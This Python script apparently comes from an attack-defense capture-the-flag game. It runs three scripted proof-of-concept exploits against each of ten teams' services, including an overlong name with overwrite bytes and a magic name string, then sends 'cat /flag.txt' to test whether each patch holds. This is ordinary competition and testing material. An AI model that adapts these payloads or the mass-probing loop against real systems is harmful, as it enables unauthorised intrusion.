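#! /usr/bin/env python2
"""Attack-defense checker: probe every team's service with three PoCs.

Each ``pocN`` function drives one scripted menu dialogue against the service at
``(host, port)`` and returns ``True`` when the reply to ``cat /flag.txt``
contains ``FORMAT`` -- i.e. the service still leaks the flag and the team's
patch does not hold -- and ``False`` otherwise.  The main loop prints one
result line per team.
"""
from pwn import remote, context
from multiprocessing import pool  # not used by this script; kept as in the original

context.log_level = "error"  # silence pwntools' per-connection chatter

HOST = "192.168.2.20"
TOTAL_TEAMS = 10
FORMAT = "SlashRootCTF"  # substring every valid flag contains
# Seconds to wait for any single reply.  Without a timeout one unresponsive
# service blocks the whole run forever.  (Constructed default; tune as needed.)
TIMEOUT = 10
MENU_PROMPT = ">"
FLAG_COMMAND = "cat /flag.txt"


def _flag_leaked(p):
    """Finish the menu path shared by all three PoCs and read the flag reply.

    The caller must already have the service sitting at the prompt that
    precedes option ``4``.  Ten further prompts are answered with ``99`` before
    ``FLAG_COMMAND`` is sent, exactly as the original dialogue did.

    Returns ``True`` when the text received up to the closing ``}`` contains
    ``FORMAT``.  On a timeout ``recvuntil`` yields an empty string, so the
    result is ``False`` rather than a hang.
    """
    p.sendline("4")
    p.recvuntil(MENU_PROMPT)
    p.sendline("y")
    for _ in range(10):
        p.recvuntil(MENU_PROMPT)
        p.sendline("99")
    p.sendline(FLAG_COMMAND)
    reply = p.recvuntil("}")
    return FORMAT in reply


def poc0(host, port):
    """PoC 0: an overlong name (32 filler bytes plus 9 trailing bytes).

    The service is expected to reject the oversized name; if its next prompt
    instead contains ``young`` the dialogue continues down the shared path.
    Returns ``True`` only if the flag is then readable.
    """
    with remote(host, port, timeout=TIMEOUT) as p:
        p.recvuntil(MENU_PROMPT)
        p.sendline("A" * 32 + "\x11" * 8 + "\x01")
        reply = p.recvuntil(MENU_PROMPT)
        if "young" not in reply:
            return False
        p.sendline("y")
        p.recvuntil(MENU_PROMPT)
        p.sendline("2")
        p.recvuntil(MENU_PROMPT)
        return _flag_leaked(p)


def poc1(host, port):
    """PoC 1: the ``Leo`` name followed by two ``3``/``0`` option rounds.

    A prompt containing ``Who`` after those rounds means the service refused
    the path and the check reports ``False``; otherwise options ``y`` and
    ``1`` lead into the shared flag-reading path.
    """
    with remote(host, port, timeout=TIMEOUT) as p:
        p.recvuntil(MENU_PROMPT)
        p.sendline("Leo")
        p.recvuntil(MENU_PROMPT)
        p.sendline("y")
        for _ in range(2):
            p.recvuntil(MENU_PROMPT)
            p.sendline("3")
            p.recvuntil(MENU_PROMPT)
            p.sendline("0")
        if "Who" in p.recvuntil(MENU_PROMPT):
            return False
        p.sendline("y")
        p.recvuntil(MENU_PROMPT)
        p.sendline("1")
        p.recvuntil(MENU_PROMPT)
        return _flag_leaked(p)


def poc2(host, port):
    """PoC 2: a fixed special name followed by option ``6``.

    Only when the service answers with ``Lv: 1000000`` does the dialogue
    continue (option ``2``, then the shared flag-reading path); any other
    reply means the check reports ``False``.
    """
    with remote(host, port, timeout=TIMEOUT) as p:
        p.recvuntil(MENU_PROMPT)
        p.sendline("__th3_w0rLd_D3str0Y3r_15_b4ck__")
        p.recvuntil(MENU_PROMPT)
        p.sendline("y")
        p.recvuntil(MENU_PROMPT)
        p.sendline("6")
        if "Lv: 1000000" not in p.recvuntil(MENU_PROMPT):
            return False
        p.sendline("2")
        p.recvuntil(MENU_PROMPT)
        return _flag_leaked(p)


def _run_poc(poc, host, port):
    """Run one PoC and return its result, or ``None`` if the dialogue failed.

    A service that is down, or that closes the socket mid-dialogue (EOF), must
    not abort the check of the remaining teams, so errors are reported on
    stdout and the loop carries on.
    """
    try:
        return poc(host, port)
    except Exception as exc:  # top-level boundary of one check: report, continue
        print("  %s on %s:%d failed: %r" % (poc.__name__, host, port, exc))
        return None


if __name__ == "__main__":
    for team in range(1, TOTAL_TEAMS + 1):
        port = 60004 + team * 100  # one service port per team, same layout as before
        results = tuple(_run_poc(poc, HOST, port) for poc in (poc0, poc1, poc2))
        print("Team [%s] %s %s %s" % ((team,) + results))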